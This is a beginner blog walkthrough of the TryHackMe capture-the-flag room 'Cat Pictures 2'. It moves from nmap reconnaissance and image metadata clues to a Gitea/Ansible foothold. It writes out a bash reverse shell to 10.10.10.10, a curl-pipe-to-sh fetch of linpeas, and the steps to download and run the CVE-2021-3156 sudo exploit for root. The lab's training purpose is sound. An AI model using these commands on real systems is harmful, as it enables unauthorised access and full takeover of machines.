A walkthrough of the TryHackMe room 'Cat Pictures 2.'

This is a beginner-friendly walkthrough of the TryHackMe room 'Cat Pictures 2.' This guide will demonstrate valuable skills such as basic reconnaissance and steganography, leading to a broken access control vulnerability that grants us a foothold. Finally, we will perform some enumeration for privilege escalation into root using a common vulnerability (CVE).

Blanco

5/8/20243 min read

After receiving the target IP, I run a simple Nmap scan with the command

sudo nmap -p- -sC $IP --min-rate=1000

We are quickly made aware of 6 open ports

  • 22— ssh

  • 80 — lychee

  • 222

  • 1337

  • 3000

  • 8080 — python http server

Visiting Lychee (port 80), we find a crafty clue about the first image.

Another computer tool called Ansible runs magic “playbooks” on a unique door called port 1337. The code from our notebook (Gitea) runs these playbooks. We tested by changing the code in Gitea and saw in the logs that our changes took effect.

Let's try the credentials from that Hidden URL to login into this Gitea

user: samarium

password: TUmhyZ37CLZrhP

First, we logged into a website called Gitea and found our very first secret prize (a “flag”). Gitea is like an enormous notebook on the internet where people store and share code.

Travesring to the hidden URL on port 8080 revels.

http://$IP:8080/764efa883dda1e11db47671c4a3bbd9e.txt

Taking the hint on the metadata, we ran Exiftool on the image to find a URL interest in port 8080.

exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg

The Gitea is on port 3000

We replaced the code with a secret tunnel called a reverse shell (found on revshells.com). This tunnel command looks like this:

bash -c "bash -i >& /dev/tcp/10.10.10.10/6666 0>&1"

On attacking machine run:

rlwrap -cAr nc -lvnp 6666

Then, we told the computer on port 1337 to run the script. After waiting a little bit, we got inside the remote computer!

Once inside, we used linpeas to find unique clues about becoming the “root” (the most powerful user on the computer). Here’s how we did it:

We put linpeas.sh on our attacking computer.

We started a mini web server using the following:

sudo python3 -m http.server 80

Then, on the target computer from the /tmp directory, we typed:

curl -L http://10.10.10.10/Linpeas.sh | sh

With a vulnerable sudo version and some research, we find an exploit at:

https://github.com/blasty/CVE-2021-3156

We cloned (copied) the code from GitHub, put it into a file, and turned it into a nice package:

sudo git clone https://github.com/blasty/CVE-2021-3156

sudo tar -cvf exploit.tar CVE-2021-3156

sudo python3 -m http.server 80

Then, on the target computer, we downloaded and opened the package:

cd /tmp

wget http://10.10.10.10/exploit.tar

tar xopf exploit.tar

Now enter the created directory:

cd CVE-2021-3156/

Inside the folder we unpacked, we used:

make

To build (or “compile”) the exploit. We checked which tricks were available using the following:

./sudo-hax-me-a-sandwich

Then we ran the trick with:

./sudo-hax-me-a-sandwich 0

This made us the “root” of the target computer, giving us complete control!

That’s it! Following these steps, we explored a computer, found ways to run code, created a secret tunnel back to ourselves, looked for weaknesses, and took control using the sudo exploit.

Special thanks:

https://tryhackme.com/r/room/catpictures2

https://abylin.medium.com/cat-pictures-2-tryhackme-walkthrough-51e0425184e4

https://www.youtube.com/watch?v=TLa2VqcGGEQ

Resources

Stay updated with the latest cybersecurity insights.

Support

Connect

info@blancobox.tech

+7577960708

© 2024. All rights reserved.